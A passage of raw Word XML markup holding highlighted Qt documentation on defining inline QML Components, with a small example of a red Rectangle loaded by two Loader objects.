        </w:rPr>
        <w:t xml:space="preserve">defining a component that logically </w:t>
      </w:r>
      <w:r w:rsidRPr="00A50E12">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>belongs with other QML components within a file</w:t>
      </w:r>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00797B11" w:rsidRPr="00797B11" w:rsidRDefault="00797B11" w:rsidP="00797B11">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>For example, here is a component that is used by multiple</w:t>
      </w:r>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1484" w:history="1">
        <w:r w:rsidRPr="003E1EBA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Loader</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>objects. It contains a single item, a</w:t>
      </w:r>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1485" w:history="1">
        <w:r w:rsidRPr="00797B11">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Rectangle</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QtQuick</w:t>
      </w:r>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2.0</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97B11" w:rsidRPr="00797B11" w:rsidRDefault="00490E7E"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486" w:history="1">
        <w:r w:rsidR="00797B11" w:rsidRPr="00797B11">
          <w:rPr>
            <w:rStyle w:val="typ"/>
            <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
            <w:color w:val="21BE2B"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Item</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00797B11" w:rsidRPr="00797B11">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00797B11" w:rsidRPr="00797B11">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{</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width</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w:t>
      </w:r>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>100</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height</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w:t>
      </w:r>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>100</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hyperlink r:id="rId1487" w:history="1">
        <w:r w:rsidRPr="00797B11">
          <w:rPr>
            <w:rStyle w:val="typ"/>
            <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
            <w:color w:val="21BE2B"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Component</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{</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id</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redSquare</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hyperlink r:id="rId1488" w:history="1">
        <w:r w:rsidRPr="00797B11">
          <w:rPr>
            <w:rStyle w:val="typ"/>
            <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
            <w:color w:val="21BE2B"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Rectangle</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{</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color</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w:t>
      </w:r>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"red"</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width</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w:t>
      </w:r>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>10</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height</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w:t>
      </w:r>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>10</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r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</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r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</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hyperlink r:id="rId1489" w:history="1">
        <w:r w:rsidRPr="00797B11">
          <w:rPr>
            <w:rStyle w:val="typ"/>
            <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
            <w:color w:val="21BE2B"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Loader</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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sourceComponent</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redSquare </w:t>
      </w:r>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00797B11" w:rsidRPr="00797B11" w:rsidRDefault="00797B11" w:rsidP="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hyperlink r:id="rId1490" w:history="1">
        <w:r w:rsidRPr="00797B11">
          <w:rPr>
            <w:rStyle w:val="typ"/>
            <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
            <w:color w:val="21BE2B"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Loader</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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sourceComponent</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redSquare</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x</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w:t>
      </w:r>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00797B11" w:rsidRPr="00797B11" w:rsidRDefault="00797B11" w:rsidP="00797B11">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00797B11" w:rsidRPr="00797B11" w:rsidRDefault="00797B11" w:rsidP="00797B11">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Notice that while a</w:t>
      </w:r>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1491" w:history="1">
        <w:r w:rsidRPr="00797B11">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Rectangle</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">by itself </w:t>
      </w:r>
      <w:r w:rsidRPr="003E1EBA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>would be automatically rendered and displayed, this is not the case for the above rectangle because it is defined inside a</w:t>
      </w:r>
      <w:r w:rsidRPr="003E1EBA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="003E1EBA">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Component</w:t>
      </w:r>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. The </w:t>
      </w:r>
      <w:r w:rsidRPr="003E1EBA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>component encapsulates the QML types within, as if they were defined in a separate QML file</w:t>
      </w:r>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="003E1EBA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is not loaded until requested</w:t>
      </w:r>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (in this case, by the two</w:t>
      </w:r>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1492" w:history="1">
        <w:r w:rsidRPr="00797B11">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Loader</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">objects). Because Component is not derived from Item, </w:t>
      </w:r>
      <w:r w:rsidRPr="003E1EBA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>you cannot anchor anything to it</w:t>
      </w:r>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00797B11" w:rsidRPr="00797B11" w:rsidRDefault="00797B11" w:rsidP="00797B11">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Defining a</w:t>
      </w:r>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Component</w:t>
      </w:r>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is similar to defining a</w:t>
      </w:r>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1493" w:history="1">
        <w:r w:rsidRPr="00797B11">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QML document</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. A </w:t>
      </w:r>
      <w:r w:rsidRPr="003E1EBA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QML document has a single top-level item that defines the behavior and properties of that component, and cannot define properties or behavior outside of that top-level item</w:t>
      </w:r>
      <w:r w:rsidRPr="00797B11">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="003E1EBA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
